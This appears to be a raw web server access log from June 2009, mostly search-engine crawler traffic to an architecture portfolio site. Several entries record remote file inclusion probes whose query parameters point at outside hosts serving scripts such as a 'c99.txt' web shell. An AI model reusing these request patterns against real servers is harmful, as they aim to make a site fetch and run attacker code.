218.186.12.231 - - [21/Jun/2009:00:03:55 +0100] "GET /feidad.html HTTP/1.0" 200 820 "-" "nutch.us/Nutch-1.0 (www.nutch.us; crawler@nutch.us)" 159 1140
66.249.66.233 - - [21/Jun/2009:00:52:47 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Googlebot-Image/1.0" 205 641
66.249.66.233 - - [21/Jun/2009:00:52:47 +0100] "GET /o5.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 234 255
93.158.149.31 - - [21/Jun/2009:01:35:38 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Yandex/1.01.001 (compatible; Win16; I)" 155 641
66.249.66.233 - - [21/Jun/2009:03:30:41 +0100] "GET /no-text-2785579212831718321 HTTP/1.1" 404 374 "-" "Googlebot-Image/1.0" 255 658
58.61.164.40 - - [21/Jun/2009:05:25:15 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
58.61.164.141 - - [21/Jun/2009:05:28:24 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
58.61.164.39 - - [21/Jun/2009:05:36:55 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
124.115.0.22 - - [21/Jun/2009:05:39:45 +0100] "HEAD / HTTP/1.1" 200 - "http://www.decodeine.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 244 359
66.249.66.233 - - [21/Jun/2009:05:41:22 +0100] "GET / HTTP/1.1" 200 1266 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 231 1625
124.115.1.7 - - [21/Jun/2009:05:48:15 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
58.61.164.139 - - [21/Jun/2009:05:49:52 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
124.115.1.8 - - [21/Jun/2009:05:57:35 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
58.61.164.140 - - [21/Jun/2009:06:03:43 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
66.249.66.233 - - [21/Jun/2009:06:47:27 +0100] "GET /dec4b.swf HTTP/1.1" 200 7503350 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 240 7503735
88.131.106.11 - - [21/Jun/2009:07:22:39 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" 199 603
88.131.106.11 - - [21/Jun/2009:07:22:40 +0100] "GET /feidad.html HTTP/1.0" 200 820 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" 200 1140
208.80.195.55 - - [21/Jun/2009:09:21:42 +0100] "GET / HTTP/1.0" 200 1266 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; FDM; .NET CLR 2.0.50727)" 167 1587
216.129.119.14 - - [21/Jun/2009:09:57:41 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 199 603
66.249.66.233 - - [21/Jun/2009:10:12:56 +0100] "GET /ob6.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 235 256
93.158.149.31 - - [21/Jun/2009:10:26:43 +0100] "GET / HTTP/1.1" 200 1266 "-" "Yandex/1.01.001 (compatible; Win16; I)" 450 1625
66.249.66.233 - - [21/Jun/2009:11:04:18 +0100] "GET /webalizer/usage_200906.html HTTP/1.1" 200 146723 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 147087
66.249.66.233 - - [21/Jun/2009:13:56:24 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Googlebot-Image/1.0" 205 641
66.249.66.233 - - [21/Jun/2009:13:56:24 +0100] "GET /hs03.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 236 255
220.181.7.13 - - [21/Jun/2009:14:33:09 +0100] "GET / HTTP/1.1" 200 1266 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 195 1587
114.80.93.71 - - [21/Jun/2009:19:17:11 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
220.181.61.234 - - [21/Jun/2009:19:48:19 +0100] "GET / HTTP/1.1" 200 1266 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" 275 1587
74.6.22.183 - - [21/Jun/2009:21:03:20 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 194 603
74.6.22.183 - - [21/Jun/2009:21:03:21 +0100] "GET / HTTP/1.0" 200 1266 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 365 1587
66.249.66.233 - - [21/Jun/2009:23:30:36 +0100] "GET /log/error.log.2 HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 296 254
58.61.164.207 - - [22/Jun/2009:00:35:32 +0100] "GET /robots.txt HTTP/1.1" 404 357 "http://www.decodeine.com/robots.txt" "Sosospider+(+http://help.soso.com/webspider.htm)" 240 641
123.125.64.38 - - [22/Jun/2009:04:06:22 +0100] "GET / HTTP/1.1" 200 1266 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 153 1587
124.115.0.23 - - [22/Jun/2009:05:23:44 +0100] "HEAD / HTTP/1.1" 200 - "http://www.decodeine.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 244 359
87.118.90.151 - - [22/Jun/2009:05:41:25 +0100] "GET /log/web.log/errors.php?error=http://a2222.altervista.org/id.txt? HTTP/1.1" 404 369 "-" "libwww-perl/5.805" 185 615
87.118.90.151 - - [22/Jun/2009:05:41:25 +0100] "GET /errors.php?error=http://a2222.altervista.org/id.txt? HTTP/1.1" 404 357 "-" "libwww-perl/5.805" 173 603
87.118.90.151 - - [22/Jun/2009:05:41:25 +0100] "GET /log/errors.php?error=http://a2222.altervista.org/id.txt? HTTP/1.1" 404 361 "-" "libwww-perl/5.805" 177 607
87.118.90.151 - - [22/Jun/2009:05:45:20 +0100] "GET /errors.php?error=http://a2222.altervista.org/id.txt? HTTP/1.1" 404 357 "-" "libwww-perl/5.805" 173 603
87.118.90.151 - - [22/Jun/2009:06:06:22 +0100] "GET /log/web.log/errors.php?error=http://a2222.altervista.org/id.txt? HTTP/1.1" 404 369 "-" "libwww-perl/5.805" 185 615
87.118.90.151 - - [22/Jun/2009:06:06:23 +0100] "GET /errors.php?error=http://a2222.altervista.org/id.txt? HTTP/1.1" 404 357 "-" "libwww-perl/5.805" 173 603
87.118.90.151 - - [22/Jun/2009:06:06:23 +0100] "GET /log/errors.php?error=http://a2222.altervista.org/id.txt? HTTP/1.1" 404 361 "-" "libwww-perl/5.805" 177 607
208.80.195.51 - - [22/Jun/2009:06:25:10 +0100] "GET / HTTP/1.0" 200 1266 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Embedded Web Browser from: http://bsalsa.com/; .NET CLR 1.1.4322; .NET CLR 2.0.50727; IEMB3; IEMB3)" 208 1587
216.129.119.14 - - [22/Jun/2009:09:46:49 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 199 603
66.249.66.233 - - [22/Jun/2009:11:05:01 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 641
66.249.66.233 - - [22/Jun/2009:11:05:01 +0100] "GET /webalizer/usage_200906.html HTTP/1.1" 200 147617 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 147980
60.248.66.146 - - [22/Jun/2009:15:02:29 +0100] "GET /log///vwar/backup/errors.php?error=http://www.pcc.psu.ac.th/~adisak/vcr/4123201/images/test.gif?? HTTP/1.1" 404 375 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" 248 621
60.248.66.146 - - [22/Jun/2009:15:02:29 +0100] "GET ///vwar/backup/errors.php?error=http://www.pcc.psu.ac.th/~adisak/vcr/4123201/images/test.gif?? HTTP/1.1" 404 369 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" 244 615
216.117.128.143 - - [22/Jun/2009:18:22:35 +0100] "GET /log///?_SERVER[DOCUMENT_ROOT]=http://www.rosa10.com/lolid1.txt?? HTTP/1.1" 200 3189 "-" "Mozilla/5.0" 179 3423
216.117.128.143 - - [22/Jun/2009:18:22:36 +0100] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.rosa10.com/lolid1.txt?? HTTP/1.1" 200 1266 "-" "Mozilla/5.0" 175 1587
216.117.128.143 - - [22/Jun/2009:18:22:36 +0100] "GET /log/error.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.rosa10.com/lolid1.txt?? HTTP/1.1" 404 365 "-" "Mozilla/5.0" 195 611
216.117.128.143 - - [22/Jun/2009:18:22:36 +0100] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.rosa10.com/lolid1.txt?? HTTP/1.1" 200 1266 "-" "Mozilla/5.0" 175 1587
216.117.128.143 - - [22/Jun/2009:18:22:37 +0100] "GET /log/error.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.rosa10.com/lolid1.txt?? HTTP/1.1" 404 365 "-" "Mozilla/5.0" 195 611
216.117.128.143 - - [22/Jun/2009:18:22:37 +0100] "GET /log///?_SERVER[DOCUMENT_ROOT]=http://www.rosa10.com/lolid1.txt?? HTTP/1.1" 200 3189 "-" "Mozilla/5.0" 179 3423
65.55.105.61 - - [22/Jun/2009:20:08:44 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" 208 603
65.55.105.61 - - [22/Jun/2009:20:08:47 +0100] "GET / HTTP/1.1" 304 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" 248 216
74.6.22.183 - - [22/Jun/2009:20:28:52 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 194 603
74.6.22.183 - - [22/Jun/2009:20:28:53 +0100] "GET /log/?N=D HTTP/1.0" 200 3184 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 373 3418
77.105.36.101 - - [22/Jun/2009:20:57:02 +0100] "GET /log/admin.php?include_path=http://w7ed.by.ru/c99.txt???? HTTP/1.1" 404 360 "-" "libwww-perl/5.805" 177 606
77.105.36.101 - - [22/Jun/2009:20:57:02 +0100] "GET /log/web.log/admin.php?include_path=http://w7ed.by.ru/c99.txt???? HTTP/1.1" 404 368 "-" "libwww-perl/5.805" 185 614
77.105.36.101 - - [22/Jun/2009:20:57:02 +0100] "GET /admin.php?include_path=http://w7ed.by.ru/c99.txt???? HTTP/1.1" 404 356 "-" "libwww-perl/5.805" 173 602
77.105.36.101 - - [22/Jun/2009:20:59:39 +0100] "GET /log/web.log%20/admin.php?include_path=http://w7ed.by.ru/c99.txt???? HTTP/1.1" 404 369 "-" "libwww-perl/5.805" 188 615
123.125.66.53 - - [22/Jun/2009:21:15:06 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 205 603
208.138.254.150 - - [22/Jun/2009:21:18:41 +0100] "GET / HTTP/1.0" 200 1266 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" 142 1587
208.138.254.150 - - [22/Jun/2009:21:18:41 +0100] "GET /feidad.html HTTP/1.0" 200 820 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" 153 1140
66.249.66.233 - - [22/Jun/2009:23:41:16 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Googlebot-Image/1.0" 205 641
66.249.66.233 - - [22/Jun/2009:23:41:17 +0100] "GET /ob7.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 235 255
66.249.66.233 - - [22/Jun/2009:23:44:09 +0100] "GET /ob18.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 236 256
66.249.66.233 - - [23/Jun/2009:01:40:10 +0100] "GET /hs20.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 236 256
208.80.195.36 - - [23/Jun/2009:03:20:15 +0100] "GET / HTTP/1.0" 200 1266 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; (R1 1.3; yplus 5.1.04b))" 132 1587
66.249.66.233 - - [23/Jun/2009:03:23:18 +0100] "GET /no-text718027532807851542 HTTP/1.1" 404 372 "-" "Googlebot-Image/1.0" 253 656
124.115.0.22 - - [23/Jun/2009:03:59:04 +0100] "HEAD / HTTP/1.1" 200 - "http://www.decodeine.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 244 359
66.249.66.233 - - [23/Jun/2009:04:46:58 +0100] "GET /no-text-6896650259792840434 HTTP/1.1" 404 374 "-" "Googlebot-Image/1.0" 255 658
123.125.64.15 - - [23/Jun/2009:06:23:16 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 182 603
220.181.7.20 - - [23/Jun/2009:06:23:59 +0100] "GET / HTTP/1.1" 200 1266 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 195 1587
58.61.164.207 - - [23/Jun/2009:06:25:31 +0100] "GET /robots.txt HTTP/1.1" 404 357 "http://www.decodeine.com/robots.txt" "Sosospider+(+http://help.soso.com/webspider.htm)" 240 641
64.246.187.42 - - [23/Jun/2009:06:48:14 +0100] "GET /robots.txt HTTP/1.0" 404 357 "http://www.whois.sc/" "SurveyBot/2.3 (Whois Source)" 212 603
64.246.187.42 - - [23/Jun/2009:06:48:14 +0100] "GET / HTTP/1.1" 206 1266 "http://whois.domaintools.com/decodeine.com" "SurveyBot/2.3 (Whois Source)" 351 1634
66.249.66.233 - - [23/Jun/2009:07:20:53 +0100] "GET /hs07.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 236 255
66.249.66.233 - - [23/Jun/2009:09:10:01 +0100] "GET /hs15.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 236 255
66.249.66.233 - - [23/Jun/2009:09:12:48 +0100] "GET /oa1.jpg HTTP/1.1" 404 354 "-" "Googlebot-Image/1.0" 235 638
78.138.158.42 - - [23/Jun/2009:09:26:08 +0100] "GET / HTTP/1.0" 200 1266 "-" "-" 43 1587
216.129.119.14 - - [23/Jun/2009:10:16:33 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 199 603
66.249.66.233 - - [23/Jun/2009:10:17:10 +0100] "GET /ob15.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 236 256
190.144.44.36 - - [23/Jun/2009:10:40:52 +0100] "GET /?_SERVER[DOCUMENT_ROOT]=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt?%0D?? HTTP/1.1" 200 1266 "-" "libwww-perl/5.79" 185 1587
190.144.44.36 - - [23/Jun/2009:10:40:52 +0100] "GET /log/?_SERVER[DOCUMENT_ROOT]=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt?%0D?? HTTP/1.1" 200 3184 "-" "libwww-perl/5.79" 189 3418
190.144.44.36 - - [23/Jun/2009:10:40:52 +0100] "GET /log/web.log/?_SERVER[DOCUMENT_ROOT]=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt?%0D?? HTTP/1.1" 404 359 "-" "libwww-perl/5.79" 197 605
190.144.44.36 - - [23/Jun/2009:10:40:58 +0100] "GET /log/error.log/?_SERVER[DOCUMENT_ROOT]=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt?%0D?? HTTP/1.1" 404 361 "-" "libwww-perl/5.79" 199 607
66.249.66.233 - - [23/Jun/2009:11:05:06 +0100] "GET /webalizer/usage_200906.html HTTP/1.1" 200 149009 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 149373
222.149.230.212 - - [23/Jun/2009:14:54:19 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.org/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11" 420 1625
222.149.230.212 - - [23/Jun/2009:14:54:19 +0100] "GET /index.jpg HTTP/1.1" 200 225683 "http://www.decodeine.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11" 399 226046
222.149.230.212 - - [23/Jun/2009:14:54:20 +0100] "GET /indexbutton.jpg HTTP/1.1" 200 153759 "http://www.decodeine.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11" 405 154123
222.149.230.212 - - [23/Jun/2009:14:54:23 +0100] "GET /favicon.ico HTTP/1.1" 404 358 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11" 365 641
222.149.230.212 - - [23/Jun/2009:14:54:26 +0100] "GET /favicon.ico HTTP/1.1" 404 358 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11" 395 641
222.149.230.212 - - [23/Jun/2009:14:54:34 +0100] "GET /feidad.html HTTP/1.1" 200 820 "http://www.decodeine.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11" 431 1177
222.149.230.212 - - [23/Jun/2009:14:54:34 +0100] "GET /dec4b.swf HTTP/1.1" 200 7503350 "http://www.decodeine.com/feidad.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11" 440 7503734
222.149.230.212 - - [23/Jun/2009:14:56:00 +0100] "GET /oba4.jpg HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11" 392 639
222.149.230.212 - - [23/Jun/2009:14:56:00 +0100] "GET /oba1.jpg HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11" 392 639
222.149.230.212 - - [23/Jun/2009:14:56:00 +0100] "GET /oba3.jpg HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11" 392 639
222.149.230.212 - - [23/Jun/2009:14:56:00 +0100] "GET /oba2.jpg HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11" 392 639
220.181.61.234 - - [23/Jun/2009:19:12:01 +0100] "GET / HTTP/1.1" 200 1266 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" 275 1587
79.27.182.149 - - [23/Jun/2009:22:12:19 +0100] "GET /dec4b.swf HTTP/1.1" 200 7503350 "http://images.google.gr/imgres?imgurl=http://www.decodeine.com/hs06.jpg&imgrefurl=http://www.decodeine.com/dec4b.swf&usg=__58OUUrz_hT-2V_KBUSEBTfXk664=&h=365&w=494&sz=76&hl=el&start=612&um=1&tbnid=u6ajcLhkYznCiM:&tbnh=96&tbnw=130&prev=/images%3Fq%3Daxonometric%2Bnew%2Byork%26ndsp%3D21%26hl%3Del%26sa%3DN%26start%3D609%26um%3D1" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.22) Gecko/20090615 Camino/1.6.8 (like Firefox/2.0.0.22)" 849 819360
79.27.182.149 - - [23/Jun/2009:22:12:21 +0100] "GET /favicon.ico HTTP/1.1" 404 358 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.22) Gecko/20090615 Camino/1.6.8 (like Firefox/2.0.0.22)" 513 642
79.27.182.149 - - [23/Jun/2009:22:12:21 +0100] "GET /hs06.jpg HTTP/1.1" 200 77326 "http://images.google.gr/imgres?imgurl=http://www.decodeine.com/hs06.jpg&imgrefurl=http://www.decodeine.com/dec4b.swf&usg=__58OUUrz_hT-2V_KBUSEBTfXk664=&h=365&w=494&sz=76&hl=el&start=612&um=1&tbnid=u6ajcLhkYznCiM:&tbnh=96&tbnw=130&prev=/images%3Fq%3Daxonometric%2Bnew%2Byork%26ndsp%3D21%26hl%3Del%26sa%3DN%26start%3D609%26um%3D1" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.22) Gecko/20090615 Camino/1.6.8 (like Firefox/2.0.0.22)" 848 77689
79.27.182.149 - - [23/Jun/2009:22:12:23 +0100] "GET /dec4b.swf HTTP/1.1" 206 6930615 "http://images.google.gr/imgres?imgurl=http://www.decodeine.com/hs06.jpg&imgrefurl=http://www.decodeine.com/dec4b.swf&usg=__58OUUrz_hT-2V_KBUSEBTfXk664=&h=365&w=494&sz=76&hl=el&start=612&um=1&tbnid=u6ajcLhkYznCiM:&tbnh=96&tbnw=130&prev=/images%3Fq%3Daxonometric%2Bnew%2Byork%26ndsp%3D21%26hl%3Del%26sa%3DN%26start%3D609%26um%3D1" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.22) Gecko/20090615 Camino/1.6.8 (like Firefox/2.0.0.22)" 911 1291680
208.80.195.55 - - [24/Jun/2009:02:07:36 +0100] "GET / HTTP/1.0" 200 1266 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts-MyWay; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" 167 1587
124.115.0.22 - - [24/Jun/2009:02:25:57 +0100] "HEAD / HTTP/1.1" 200 - "http://www.decodeine.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 244 359
74.6.22.183 - - [24/Jun/2009:02:27:43 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 194 603
74.6.22.183 - - [24/Jun/2009:02:27:45 +0100] "GET /feidad.html HTTP/1.0" 200 820 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 376 1140
66.249.66.233 - - [24/Jun/2009:03:46:49 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 641
66.249.66.233 - - [24/Jun/2009:03:46:49 +0100] "GET / HTTP/1.1" 200 1266 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 231 1624
66.249.66.233 - - [24/Jun/2009:04:00:46 +0100] "GET /log/?C=S;O=D HTTP/1.1" 200 3184 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 243 3456
219.234.81.33 - - [24/Jun/2009:05:06:42 +0100] "GET / HTTP/1.1" 200 1266 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Avant Browser; InfoPath.1; .NET CLR 2.0.50727; .NET CLR1.1.4322)" 376 1587
219.234.81.33 - - [24/Jun/2009:05:06:44 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "-" 73 584
216.129.119.14 - - [24/Jun/2009:05:14:12 +0100] "GET /log/?C=M;O=D HTTP/1.0" 200 3184 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 201 3418
205.168.84.133 - - [24/Jun/2009:06:22:32 +0100] "GET / HTTP/1.1" 200 1266 "http://www.benninghofflaw.com/fresno-criminal-lawyer.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" 262 1587
66.249.66.233 - - [24/Jun/2009:06:32:25 +0100] "GET /webalizer/usage_200507.html HTTP/1.1" 200 77340 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 77702
66.249.66.233 - - [24/Jun/2009:08:30:40 +0100] "GET /CAM1.swf HTTP/1.1" 404 355 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 239 639
66.249.66.233 - - [24/Jun/2009:08:30:40 +0100] "GET /fdesign%201.swf HTTP/1.1" 404 360 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 246 643
118.175.4.66 - - [24/Jun/2009:09:47:54 +0100] "GET /dec4b.swf HTTP/1.1" 200 7503350 "http://www.google.co.th/search?q=reflection+refraction+diffraction+waves.swf&hl=th&start=110&sa=N" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.1)" 326 137240
66.249.66.233 - - [24/Jun/2009:09:55:09 +0100] "GET /webalizer/usage_200707.html HTTP/1.1" 200 150873 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 151237
118.175.4.66 - - [24/Jun/2009:10:19:34 +0100] "GET /dec4b.swf HTTP/1.1" 206 7423435 "http://www.google.co.th/search?q=refraction+water+waves.swf&hl=th&start=250&sa=N" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.1)" 424 773800
118.175.4.66 - - [24/Jun/2009:10:33:28 +0100] "GET /dec4b.swf HTTP/1.1" 206 6842797 "http://www.google.co.th/search?q=diffraction+of+light+waves.swf&hl=th&start=140&sa=N" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.1)" 429 636560
220.181.7.19 - - [24/Jun/2009:10:46:42 +0100] "GET / HTTP/1.1" 200 1266 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 195 1587
216.129.119.14 - - [24/Jun/2009:10:47:37 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 199 603
66.249.66.233 - - [24/Jun/2009:11:04:01 +0100] "GET /webalizer/usage_200906.html HTTP/1.1" 200 149896 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 353 150260
66.249.66.233 - - [24/Jun/2009:11:38:44 +0100] "GET /webalizer/usage_200607.html HTTP/1.1" 200 106726 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 107089
66.249.66.233 - - [24/Jun/2009:11:38:45 +0100] "GET /webalizer/usage_200703.html HTTP/1.1" 200 110824 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 111186
83.133.125.202 - - [24/Jun/2009:13:00:56 +0100] "GET / HTTP/1.0" 200 1266 "-" "-" 43 1587
83.133.125.202 - - [24/Jun/2009:13:00:56 +0100] "GET / HTTP/1.0" 200 1266 "-" "-" 43 1587
58.61.164.207 - - [24/Jun/2009:14:33:01 +0100] "GET /robots.txt HTTP/1.1" 404 357 "http://www.decodeine.com/robots.txt" "Sosospider+(+http://help.soso.com/webspider.htm)" 240 641
66.249.66.233 - - [24/Jun/2009:14:39:29 +0100] "GET /no-text-7799354637470529992 HTTP/1.1" 404 374 "-" "Googlebot-Image/1.0" 255 658
66.249.66.233 - - [24/Jun/2009:15:16:17 +0100] "GET /eh4.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 235 255
72.30.142.229 - - [24/Jun/2009:15:47:03 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 194 603
72.30.142.229 - - [24/Jun/2009:15:47:03 +0100] "GET /log/?D=D HTTP/1.0" 200 3184 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 373 3418
66.249.66.233 - - [24/Jun/2009:18:02:57 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Googlebot-Image/1.0" 205 641
66.249.66.233 - - [24/Jun/2009:18:02:58 +0100] "GET /eh18.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 236 255
66.249.66.233 - - [24/Jun/2009:20:53:57 +0100] "GET /bs10.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 236 255
66.249.66.233 - - [24/Jun/2009:21:19:56 +0100] "GET /ob1.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 235 256
